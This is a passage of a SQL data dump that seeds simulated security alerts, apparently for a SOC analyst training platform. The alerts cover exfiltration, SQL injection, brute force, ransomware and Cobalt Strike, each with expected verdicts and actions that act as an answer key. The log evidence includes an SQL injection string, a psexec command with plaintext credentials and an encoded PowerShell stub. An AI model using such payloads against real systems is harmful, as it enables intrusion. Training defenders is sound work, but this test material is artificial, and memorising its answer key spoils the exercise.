'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.495Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:10:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"workstation02\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.495Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:10:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"workstation02\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.495Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:10:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"workstation02\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.495Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:10:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"workstation02\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.495Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T09:10:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"workstation02\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.1.20 -u admin -p password cmd\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(836, 'Data Exfiltration Attempt via Suspicious External Connection', 'high', 'IDS/IPS', 'A connection was established to an external IP known for data exfiltration activities.', 'Data Exfil', 'T1048', 1, 'investigating', NULL, '{\"timestamp\":\"2026-01-14T12:22:11Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"198.51.100.10\",\"username\":\"nsmith\",\"hostname\":\"laptop01\"}', '2026-01-14 15:19:37', '2026-03-11 01:23:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple data exfiltration incidents\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is known for data exfiltration, indicating a serious breach attempt.\"}', 'Intermediate', 'NDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:22:11Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"nsmith\\\",\\\"hostname\\\":\\\"laptop01\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:22:11Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"nsmith\\\",\\\"hostname\\\":\\\"laptop01\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:22:11Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"nsmith\\\",\\\"hostname\\\":\\\"laptop01\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:22:11Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"nsmith\\\",\\\"hostname\\\":\\\"laptop01\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.496Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T12:22:11Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.25\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"nsmith\\\",\\\"hostname\\\":\\\"laptop01\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(837, 'SQL Injection Attempt Detected on Web Server', 'critical', 'Linux Server', 'An SQL injection attempt was detected in a web request targeting the main web server.', 'Web Attack', 'T1190', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T14:55:32Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.75\",\"dst_ip\":\"192.168.1.50\",\"username\":\"\",\"hostname\":\"web-server\",\"request_body\":\"\' OR \'1\'=\'1\' --\",\"url\":\"http://example.com/login\"}', '2026-01-14 15:19:37', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.75\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous SQL injection attempts\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://example.com/login\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Potential target for SQL injection\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"\' OR \'1\'=\'1\' --\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"close_alert\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The payload is a classic SQL injection attempt, requiring immediate remediation.\"}', 'Intermediate', 'SIEM', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.497Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T14:55:32Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.75\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://example.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.497Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T14:55:32Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.75\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://example.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.497Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T14:55:32Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.75\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://example.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.497Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T14:55:32Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.75\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://example.com/login\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.497Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T14:55:32Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.75\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"request_body\\\":\\\"\' OR \'1\'=\'1\' --\\\",\\\"url\\\":\\\"http://example.com/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(838, 'Failed Brute Force Login Attempts Detected from External IP', 'medium', 'Linux Server', 'Multiple failed login attempts detected from an external IP, indicating a potential brute force attack.', 'Brute Force', 'T1110', 0, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T16:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.100\",\"dst_ip\":\"192.168.1.55\",\"username\":\"admin\",\"hostname\":\"web-server\",\"failed_attempts\":25}', '2026-01-14 15:19:37', '2026-02-22 15:15:41', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The volume and pattern of failed attempts suggest a brute force attack from a known malicious IP.\"}', 'Intermediate', 'SIEM', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.499Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"dst_ip\\\":\\\"192.168.1.55\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:31:22.499Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"dst_ip\\\":\\\"192.168.1.55\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:30:22.499Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"dst_ip\\\":\\\"192.168.1.55\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:29:22.499Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"dst_ip\\\":\\\"192.168.1.55\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-02-01T20:28:22.499Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T16:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"dst_ip\\\":\\\"192.168.1.55\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(839, 'Unauthorized Port Scan Detected from Internal IP', 'low', 'Firewall', 'An internal IP was detected performing port scans across the network, likely an internal security test.', 'Suspicious Activity', 'T1046', 0, 'New', NULL, '{\"timestamp\":\"2026-01-14T18:30:45Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"192.168.1.101\",\"username\":\"security_test\",\"hostname\":\"security-scanner\"}', '2026-01-14 15:19:37', '2026-02-01 20:32:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"suspicious_activity\",\"analysis_notes\":\"The activity matches the profile of an internal security scan, not a malicious attack.\"}', 'Intermediate', 'NDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(840, 'High Volume of DNS Requests Detected from Internal IP', 'low', 'DNS Server', 'A significant number of DNS requests were observed from an internal IP, likely due to a misconfigured system.', 'Anomaly', 'T1071', 0, 'closed', NULL, '{\"timestamp\":\"2026-01-14T20:15:30Z\",\"event_type\":\"dns_request\",\"src_ip\":\"192.168.2.30\",\"dst_ip\":\"8.8.8.8\",\"hostname\":\"misconfigured-device\"}', '2026-01-14 15:19:37', '2026-02-17 05:27:55', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"8.8.8.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Public DNS server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"anomaly\",\"analysis_notes\":\"The high volume of DNS requests is likely due to a misconfigured internal device, not a security threat.\"}', 'Intermediate', 'CORE', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.501Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T20:15:30Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"8.8.8.8\\\",\\\"hostname\\\":\\\"misconfigured-device\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.501Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T20:15:30Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"8.8.8.8\\\",\\\"hostname\\\":\\\"misconfigured-device\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.501Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T20:15:30Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"8.8.8.8\\\",\\\"hostname\\\":\\\"misconfigured-device\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.501Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T20:15:30Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"8.8.8.8\\\",\\\"hostname\\\":\\\"misconfigured-device\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.501Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T20:15:30Z\\\",\\\"event_type\\\":\\\"dns_request\\\",\\\"src_ip\\\":\\\"192.168.2.30\\\",\\\"dst_ip\\\":\\\"8.8.8.8\\\",\\\"hostname\\\":\\\"misconfigured-device\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(841, 'Ransomware Detected - LockBit 3.0 Encryption Activity', 'critical', 'CrowdStrike', 'CrowdStrike detected a ransomware encryption activity involving LockBit 3.0 on an internal host. Evidence of encrypted files and ransom note found.', 'Malware', 'T1486', 1, 'resolved', NULL, '{\"timestamp\":\"2026-01-14T03:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"203.0.113.10\",\"username\":\"jdoe\",\"hostname\":\"GOV-WS123\",\"command_line\":\"C:\\\\Program Files\\\\LockBit\\\\encrypt.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\"}', '2026-01-14 15:21:38', '2026-02-16 17:57:49', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address indicating the affected host.\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\Program Files\\\\LockBit\\\\encrypt.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known LockBit 3.0 ransomware executable.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with LockBit 3.0 ransomware.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"LockBit 3.0 ransomware activity confirmed by malicious file hash and command line execution.\"}', 'Beginner', 'EDR', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(842, 'Cobalt Strike Beacon Detected from External IP', 'high', 'Splunk', 'A Cobalt Strike beacon was detected connecting to an external IP, indicating potential command and control activity.', 'Malware', 'T1105', 1, 'investigating', 174, '{\"timestamp\":\"2026-01-14T10:20:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.5\",\"username\":\"svc_account\",\"hostname\":\"GOV-SERVER01\",\"command_line\":\"c:\\\\windows\\\\system32\\\\net.exe use\"}', '2026-01-14 15:21:38', '2026-02-26 04:49:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks and C2 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal server IP associated with the suspicious network activity.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"External IP associated with known C2 activity confirmed as malicious, indicating a potential breach.\"}', 'Beginner', 'NDR', 3, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.503Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T10:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_account\\\",\\\"hostname\\\":\\\"GOV-SERVER01\\\",\\\"command_line\\\":\\\"c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\net.exe use\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.503Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T10:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_account\\\",\\\"hostname\\\":\\\"GOV-SERVER01\\\",\\\"command_line\\\":\\\"c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\net.exe use\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.503Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-01-14T10:20:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"svc_account\\\",\\\"hostname\\\":\\\"GOV-SERVER01\\\",\\\"command_line\\\":\\\"c:\\\\\\\\windows\\\\\\\\system32\\\\\\\\net.exe 